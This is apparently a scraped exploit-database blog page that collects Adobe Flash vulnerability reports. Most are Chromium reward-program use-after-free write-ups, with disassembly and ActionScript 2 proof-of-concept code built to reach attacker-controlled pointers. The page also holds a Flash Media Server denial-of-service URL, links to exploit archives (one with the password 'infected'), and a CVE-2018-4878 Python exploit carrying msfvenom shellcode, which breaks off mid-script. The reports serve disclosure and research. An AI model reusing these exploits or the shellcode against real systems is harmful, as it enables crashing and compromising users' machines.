source: https://www.securityfocus.com/bid/49103/info
The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability.
Successful exploits will allow attackers to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.
http://www.example.com:1111/?%
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86399734
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=557
There are a number of use-after-free vulnerabilities in MovieClip.beginGradientFill. If the spreadMethod or any other string parameter is an object with toString defined, this method can free the MovieClip, which is then used. Note that many parameters to this function can be used to execute script and free the MovieClip during execution, it is recommended that this issues be fixed with a stale pointer check.
A PoC is as follows:
this.createEmptyMovieClip("bmp_fill_mc", 1);
with (bmp_fill_mc) {
colors = [0xFF0000, 0x0000FF];
fillType = "radial"
alphas = [100, 100];
ratios = [0, 0xFF];
var o = {toString: func};
spreadMethod = o;
interpolationMethod = "linearRGB";
focalPointRatio = 0.9;
matrix = new Matrix();
matrix.createGradientBox(100, 100, Math.PI, 0, 0);
beginGradientFill(fillType, colors, alphas, ratios, matrix,
spreadMethod, interpolationMethod, focalPointRatio);
moveTo(100, 100);
lineTo(100, 300);
lineTo(300, 300);
lineTo(300, 100);
lineTo(100, 100);
endFill();
}
bmp_fill_mc._xscale = 200;
bmp_fill_mc._yscale = 200;
function func(){
trace("in func");
var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
trace(test);
test.removeTextField();
return "reflect";
}
A sample swf and fla is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39022.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=627
The attached swf file causes an out-of-bounds memset in BlurFilter processing. Note that Chrome aborts when processing the swf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39219.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Flash 17.0.0.169 added a flag to mitigate Issue 457278
.text:004D6F0B mov esi, [esp+2Ch+var_C]
.text:004D6F0F push 1 ; char
.text:004D6F11 mov ecx, edi ; int
.text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added
.text:004D6F17 call xparseAS2Code
.text:004D6F1C mov byte ptr [esi+0Ch], 0
Flash 18.0.0.160 added an other flag to mitigate Issue 476926
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added
.text:004D6E42 lea eax, [ebp+0Ch]
.text:004D6E45 mov [esp+2Ch+var_8], eax
.text:004D6E49 jz short loc_4D6E58
.text:004D6E4B mov ecx, dword_E50A40
.text:004D6E51 call sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58 mov byte ptr [eax], 1
.text:004D6E5B jmp short loc_4D6E65
But they didn't figure it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F mov eax, [ebp+0]
.text:004D6E72 push 0
.text:004D6E74 lea edx, [esp+34h+var_14]
.text:004D6E78 push edx
.text:004D6E79 mov edx, [eax+14h]
.text:004D6E7C mov ecx, ebp
.text:004D6E7E call edx ; return the filter name
.text:004D6E80 push eax
.text:004D6E81 lea eax, [esp+3Ch+var_10]
.text:004D6E85 push eax
.text:004D6E86 mov ecx, edi
.text:004D6E88 call xcreateStringObject
.text:004D6E8D mov ebx, [esp+38h+arg_4]
.text:004D6E91 push eax
.text:004D6E92 push ecx
.text:004D6E93 mov eax, esp
.text:004D6E95 mov ecx, edi
.text:004D6E97 mov [eax], ebx
.text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object
For ex:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.
Compile with Flash CS 5.5.
***************************************************************************
Content of FiltusPafusTer.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
var a = tfield.filters
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=480496]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
A little bug while setting the TextFilter.filters array.
Chrome 42.0.2311.90 with Flash 17.0.0.169
VERSION
Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004D6964 loc_4D6964:
.text:004D6964 and eax, 0FFFFFFF8h
.text:004D6967 push edi
.text:004D6968 mov edi, eax
.text:004D696A mov ecx, edi
.text:004D696C xor esi, esi
.text:004D696E call xAS2_getArrayLength ; here we can override object.length and execute some code
.text:004D6973 test eax, eax ; if that code frees the object pointed by ebx...
.text:004D6975 jle short loc_4D69A3
.text:004D6977
.text:004D6977 loc_4D6977:
.text:004D6977 push edi
.text:004D6978 mov ecx, esi
.text:004D697A call sub_4D3FE0 ; get an item from the object
.text:004D697F add esp, 4
.text:004D6982 test eax, eax ; we have either a filter or 0 here
.text:004D6984 jz short loc_4D6997
.text:004D6986 mov edx, [eax]
.text:004D6988 mov ecx, eax
.text:004D698A mov eax, [edx+18h]
.text:004D698D call eax
.text:004D698F push eax
.text:004D6990 mov ecx, ebx ; ...we get a use after free here
.text:004D6992 call sub_4CDB70 ; and a write-4 condition here
.text:004D6997
.text:004D6997 loc_4D6997:
.text:004D6997 mov ecx, edi
.text:004D6999 inc esi
.text:004D699A call xAS2_getArrayLength
.text:004D699F cmp esi, eax
.text:004D69A1 jl short loc_4D6977
Freeing the object pointed by ebx is easy indeed:
var tfield:TextField = createTextField("tf",1,1,2,3,4) //create a TextField at depth 1
tfield.filters = [] //create the targeted object
createTextField("textf",1,1,2,3,4) //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object
flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
}
_global.mc = this
_global.counter = 0
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
***************************************************************************
Content of flash_as2_filters_uaf_write4.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41414100
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37848.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected.
VERSION
Chrome Version: [?, Flash 17.0.0.169]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169):
.text:004D67F8 mov esi, [esp+1Ch+var_4]
.text:004D67FC push 1 ; char
.text:004D67FE mov ecx, ebp ; int
.text:004D6800 mov byte ptr [esi+0Ch], 1 // this flag was added
.text:004D6804 call xparseAS2Code
.text:004D6809 mov byte ptr [esi+0Ch], 0
And when we check the function that deletes the filters:
.text:004D66D0 push edi
.text:004D66D1 mov edi, ecx
.text:004D66D3 cmp byte ptr [edi+0Ch], 0 // check again the flag, and jump if it is set, so that the filter won't be deleted
.text:004D66D7 jnz short loc_4D6716
.text:004D66D9 cmp dword ptr [edi], 0
.text:004D66DC jz short loc_4D6708
We can bypass that feature with the following code:
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters // set the flag to 1
--- in MyGlowFilter ---
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters // set the flag to 1, and then set it to 0
//now we can free the filter :D, the flag is set to 0!
_global.tfield.filters = []
Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing.
But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344.
Can't we call that a -1day :D?
***************************************************************************
Content of FiltusPafusBis.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.f = f
_global.a1 = a1
_global.a2 = a2
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
***************************************************************************
Content of MyGlowFilter.as:
import flash.filters.GlowFilter;
class MyGlowFilter extends flash.filters.GlowFilter {
public function MyGlowFilter (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
_global.f()
}
}
***************************************************************************
Content of MyGlowFilter2.as:
import flash.filters.GlowFilter;
class MyGlowFilter2 extends flash.filters.GlowFilter {
public function MyGlowFilter2 (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
}
}
***************************************************************************
Content of FiltusPafusBis_poc.fla
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
}
_global.tfield = tfield
_global.f = f
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37847.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]
---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains
in the stack
VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.
These lines come from flashplayer standalone 17.0.0.169:
.text:00597F45 loc_597F45:
.text:00597F45 cmp eax, 6
.text:00597F48 jnz loc_597FE5
.text:00597F4E mov ecx, esi ; esi points to the MovieClip object
.text:00597F50 call sub_40C1ED
.text:00597F55 add eax, 30Ch
.text:00597F5A or dword ptr [eax], 8
.text:00597F5D mov eax, [ebx]
.text:00597F5F mov byte ptr [eax+82Ch], 1
.text:00597F66 mov ecx, [ebx]
.text:00597F68 lea eax, [ebp+74h+var_1C0]
.text:00597F6E push eax
.text:00597F6F push dword ptr [ebx+0Ch]
.text:00597F72 call xfetchRectangleProperties ; get the Rectangle properties, and execute some AS2
.text:00597F77 test al, al
.text:00597F79 jz loc_598274
.text:00597F7F mov edi, [ebp+74h+var_1C0]
.text:00597F85 mov ecx, esi
.text:00597F87 imul edi, 14h
.text:00597F8A call sub_40C1ED ; reference freed memory and return a bad
pointer
.text:00597F8F mov [eax+310h], edi ; crash here, eax = 0
Poc (compile with Flash CS5.5):
import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
_global.mc.createTextField("newtf",1,1,1,2,3)
return 7
}
var o = {x:o2,y:0,width:4,height:5}
_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=377&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=487237]
Credit is to bilou, working with the Chromium Vulnerability Reward Program
---
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property.
This is almost a repost of Issue 457680 due to a patch failure.
VERSION
Chrome Version: N/A now, Flash StandAlone Debug 17.0.0.188
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).
After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
The description is exactly the same as in Issue 457680 so I won't repost it. Here are just my comments on the patch.
They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):
.text:005AD629 loc_5AD629:
.text:005AD629 lea ecx, [esi+0DCh]
.text:005AD62F push edi
.text:005AD630 mov [ebp+1C4h+var_198], ecx
.text:005AD633 call xsetUseMarker
.text:0059F762 cmp byte ptr [ecx], 0 ; is the marker present?
.text:0059F765 jz short loc_59F77B
.text:0059F767 cmp [esp+arg_0], 0 ; is 0 provided?
.text:0059F76C jz short locret_59F77E
.text:0059F76E mov ecx, dword_EE4788 ; kill the program
.text:0059F774 call sub_9798C0
.text:0059F779 jmp short locret_59F77E
.text:0059F77B
.text:0059F77B loc_59F77B:
.text:0059F77B mov byte ptr [ecx], 1 ; else set the marker
.text:0059F77E
.text:0059F77E locret_59F77E:
.text:0059F77E retn 4
That marker is then removed when we exit the BitmapData dispatcher:
.text:005AEF29 mov eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
.text:005AEF2C mov byte ptr [eax], 0
So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:
var o = new Object()
o.valueOf = function () {
bd.getPixel32(1,4) // remove the marker :)
f()
for (var i = 0; i<0x10;i++) {
var tf:TextFormat = new TextFormat()
tf.tabStops = b
a[i] = tf
}
return 4
}
bd.getPixel32(o,4)
And we're done :)
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37861.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]
---
VULNERABILITY DETAILS
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property.
VERSION
Chrome Version: 40.0.2214.111 stable, Flash 16.0.0.305
Operating System: Win7 SP1 x64]
The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.
Here are a few steps to trigger the issue:
1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.
2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.
3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.
4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.
5) Use the first BitmapData and call getPixel32(o).
What happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:
CPU Disasm
Address Hex dump Command
6D2D3FBB 68 BE27C66D PUSH OFFSET 6DC627BE
6D2D3FC0 FF73 04 PUSH DWORD PTR DS:[EBX+4]
6D2D3FC3 56 PUSH ESI
6D2D3FC4 8B33 MOV ESI,DWORD PTR DS:[EBX]
6D2D3FC6 E8 A572F8FF CALL 6D25B270 ; that function creates a new atom and calls the BitmapData constructor
6D2D3FCB 84C0 TEST AL,AL
6D2D3FCD 74 09 JE SHORT 6D2D3FD8
6D2D3FCF 8B0B MOV ECX,DWORD PTR DS:[EBX]
6D2D3FD1 6A 01 PUSH 1
6D2D3FD3 E8 281A0100 CALL 6D2E5A00 ; if the constructor is overriden by a custom class, the custom constructor is called here
6D2D3FD8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
6D2D3FDB 8B13 MOV EDX,DWORD PTR DS:[EBX]
6D2D3FDD 56 PUSH ESI
6D2D3FDE E8 418EF6FF CALL 6D23CE24 ; then pop the new atom from the AS2 stack
...
6D2D4000 23F8 AND EDI,EAX
6D2D4002 807F 35 1B CMP BYTE PTR DS:[EDI+35],1B ; and ensure this is indeed a BitmapData
6D2D4006 74 0A JE SHORT 6D2D4012
...
In the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:
6D2D4012 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28]
6D2D4015 83E0 FE AND EAX,FFFFFFFE
6D2D4018 8B40 18 MOV EAX,DWORD PTR DS:[EAX+18] ; get the BitmapData object
6D2D401B 33C9 XOR ECX,ECX
6D2D401D 51 PUSH ECX
6D2D401E E8 1DB2FEFF CALL 6D2BF240 ; call the BitmapData destructor
6D2D4023 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]
6D2D4026 8BC7 MOV EAX,EDI
6D2D4028 E8 134AF6FF CALL 6D238A40 ; and associate the DisplacementMapFilter.mapBitmap object
All of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.
After compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
Hopefully if it works we should crash here with eax controlled:
CPU Disasm
Address Hex dump Command
6D2BFA83 3B58 0C CMP EBX,DWORD PTR DS:[EAX+0C] //eax = 0x41424344
6D2BFA86 7D 57 JGE SHORT 6D2BFADF
6D2BFA88 85FF TEST EDI,EDI
6D2BFA8A 78 53 JS SHORT 6D2BFADF
6D2BFA8C 3B78 08 CMP EDI,DWORD PTR DS:[EAX+8]
6D2BFA8F 7D 4E JGE SHORT 6D2BFADF
6D2BFA91 8BC8 MOV ECX,EAX
6D2BFA93 8B01 MOV EAX,DWORD PTR DS:[ECX]
6D2BFA95 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10]
6D2BFA98 FFD2 CALL EDX
I don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.
***************************************************************************
Content of MyBitmapData.as
class MyBitmapData extends String
{
static var mf;
function MyBitmapData()
{
super();
var a = MyBitmapData.mf
test(a,a,a,a,a,a,a,a) //that part should be deleted manually in the bytecode
trace(a) //so that MyBitmapData.mf stays on top of the AS2 stack
}
public function test(a,b,c,d,e,f,g,h) {
}
static function setBitmapData(myfilter)
{
mf = myfilter;
}
}
***************************************************************************
Content of mapBitmap_as2.fla
import flash.filters.DisplacementMapFilter;
import flash.display.BitmapData;
var bd:BitmapData = new BitmapData(10,10)
MyBitmapData.setBitmapData(bd)
var bd2:BitmapData = new BitmapData(10,10)
var dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)
newConstr = MyBitmapData
flash.display.BitmapData = newConstr
function f() {
var a = dmf.mapBitmap;
}
var a:Array = new Array()
var b:Array = new Array()
for (var i = 0; i<0xC8/4;i++) {
b[i] = 0x41424344
}
var o = new Object()
o.valueOf = function () {
f()
for (var i = 0; i<0x10;i++) {
var tf:TextFormat = new TextFormat()
tf.tabStops = b
a[i] = tf
}
return 4
}
bd.getPixel32(o,4)
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37853.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1
REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push esi
.text:004B82D1 mov esi, [esp+4+arg_0]
.text:004B82D5 push edi
.text:004B82D6 mov edi, ecx
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
.text:004B82DE and ecx, 0FFFFFFFEh
.text:004B82E1 add ecx, 3Ch
.text:004B82E4 mov eax, esi
.text:004B82E6 call sub_4B0724 ; crash below
...
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
.text:004B0726 cmp edx, [eax]
.text:004B0728 jnz short loc_4B077E
Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
tf.removeTextField()
return 0x41414142
}
var c = new Color(tf)
c.setRGB(o)
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46051.zip
Password: infected
#!/usr/bin/env python
# coding: UTF-8
import BaseHTTPServer
import sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
print "@Syfi2k"
print "[+] CVE-2018-4878 poc "
print "--------------------------------"
print "Calc.exe Shellcode via Msfvenom"
print "Based on fixed version https://github.com/anbai-inc/CVE-2018-4878"
print "No Crash without executing the Shellcode, Sandbox? try it yourself"
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
payload = buf
data = ""
flash_name = "movie"
